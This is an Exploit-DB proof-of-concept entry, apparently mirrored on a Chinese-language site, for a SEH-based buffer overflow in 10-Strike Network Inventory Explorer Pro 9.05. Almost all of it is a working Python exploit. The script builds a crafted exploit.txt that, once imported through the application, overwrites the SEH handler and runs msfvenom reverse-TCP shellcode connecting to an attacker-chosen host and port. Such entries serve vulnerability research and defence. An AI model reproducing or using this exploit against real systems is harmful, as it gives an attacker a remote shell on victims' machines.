10-Strike Network Inventory Explorer Pro 9.05 – Buffer Overflow (SEH)

  • 作者: Florian Gassner
    日期: 2020-12-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49322/
  • # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
    # Date: 2020-12-22
    # Exploit Author: Florian Gassner
    # Vendor Homepage: https://www.10-strike.com/
    # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
    # Version: 9.05
    # Tested on: Windows 10 x64
    
    # Computer -> From Text File -> Choose exploit.txt
    
    import struct
    
    """
    Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
    """
    
    OFFSET = 214
    
    """
    badchars = '\x00\x09\x0a\x0d\x3a\x5c'
    """
    
    """
    Log data, item 23
     Address=01015AF4
     Message=0x01015af4 : pop ecx # pop ebp # ret 0x04 |{PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
    """
    
    pop_pop_ret = struct.pack("<I", 0x01015af4)
    
    short_jump = '\xEB\x06\x90\x90'
    
    """
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
    """
    shellcode =""
    shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
    shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
    shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
    shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
    shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
    shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
    shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
    shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
    shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
    shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
    shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
    shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
    shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
    shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
    shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
    shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
    shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
    shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
    shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
    shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
    shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
    shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
    shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
    shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
    shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
    shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
    shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
    shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
    shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
    shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
    shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
    shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
    
    payload ='A' * (OFFSET - len(short_jump))
    payload += short_jump
    payload += pop_pop_ret
    payload += '\x90' * 8
    payload += shellcode
    
    f = open("exploit.txt", "w")
    f.write(payload)
    f.close()